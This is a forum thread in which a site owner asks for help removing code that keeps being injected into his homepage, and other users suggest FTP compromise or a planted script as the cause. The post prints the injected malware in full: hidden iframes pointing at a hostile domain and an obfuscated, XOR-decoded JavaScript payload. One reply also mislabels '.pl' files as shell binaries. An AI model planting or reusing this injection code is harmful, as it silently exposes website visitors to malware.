Help removing exploits from Host

[xsiteu]

I have been trying to remove some sort of virus from my host but it keeps coming back.

I have pasted the inserted malicious scripts at the bottom of the page.

Can anyone tell me what I need to do to remove this shit completely?

I have contacted about it. There response was that they could not find anything and nothing on their hosting is causing the problem.

*** WARNING ***

For those that may want to see what is happening I am posting the link here to my site that currently has this nasty shit. Unless you are 100 % sure you have good anti-virus protection don't click it. I use NOD32 and it immediatly blocks the threat.

The website is: http://www.xsiteu.com

Below is what keeps being inserted into my index.html:
-------------------------------------------------------------
<iframe src='http://wsfgfdgrtyhgfd.net/adv/168/new.php' width=1 height=1></iframe>
<iframe src='http://wsfgfdgrtyhgfd.net/adv/new.php?adv=168' width=1 height=1></iframe>


<script language="JavaScript">e = '0x00' + '27';str1 = "%9C%C4%CF%D2%B8%D5%D4%DF%CC%C3%9B%86%D2%CF%D5%CF%C6%CF%CC%CF%D4%DF%9E%C0%CF%C4%C4%C3%CA%86%9A%9C%CF%C2%D6%C7%CB%C3%B8%D5%D6%C5%9B%86%C0%D4%D4%C8%9E%89%89%C1%D6%C3%D4%C7%C6%C5%8A%C5%C9%CB%89%D4%D6%C2% 89%86%B8%D1%CF%C4%D4%C0%9B%97%B8%C0%C3%CF%C1%C0%D4%9B%97%9A%9C%89%CF%C2%D6%C7%CB%C3%9A%9C%89%C4%CF%D2%9A";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script>

[cd34]

change your FTP password. This exploit comes in through an FTP session which logs in, grabs the current file, changes it, puts the file within seconds. Obviously automated, but, that particular string is always updated via FTP.

[xsiteu]

Thanks CD34

I immediately went in to change my FTP accounts and discovered to my amazement that anonymous FTP was enabled on this particular domain. No idea how or why.

I removed that and changed all the account passwords to be sure. I have now removed the malicious code again. Time will tell but I am confident that you have identified the problems.

[onroad]

Sadly FTP won't solve problem. I just wasted days trying to get that same string off a domain I had. I had changed my Password 5 times and it kept coming back. For some reason when the domain was set up, "public write" was enabled. A few months back a bot must have seen this and added a file to a few folders. It had a sneaky name" backup.pl " at a glance I assumed it was something my host was using for backup reasons. But I see the ".pl" extenstion is a Linux Shell Executable Binary http://filext.com/alphalist.php?extstart=%5EP


It runs right off the server once installed. I noticed it was changing all the "default" pages.. ie index, main.htm etc. There was also a php that cloned the name of the folder it was placed in. I open both of these in notepad and they were nothing I installed. They are long coding which I'm to stupid to understand. But if somebody wants me to paste it into a response I can do that.

Anyway. All I can sugget is. contact host ensure "public write" and any other weakness is not on server. Then look in all your folders for those php & pl file extensions.. I hope this helps... BTW, it clones the "real player" update skin correct? I think it's on http://www.internext-expo.com/ also.. I get the same popup there.

OH, not to stomp on cd34.. He's the shit! But mine could have been diff from that guys in a way.. but changing my ftp didn't help in my case. I was actually thinking about asking sparky for some help until I noticed the problem...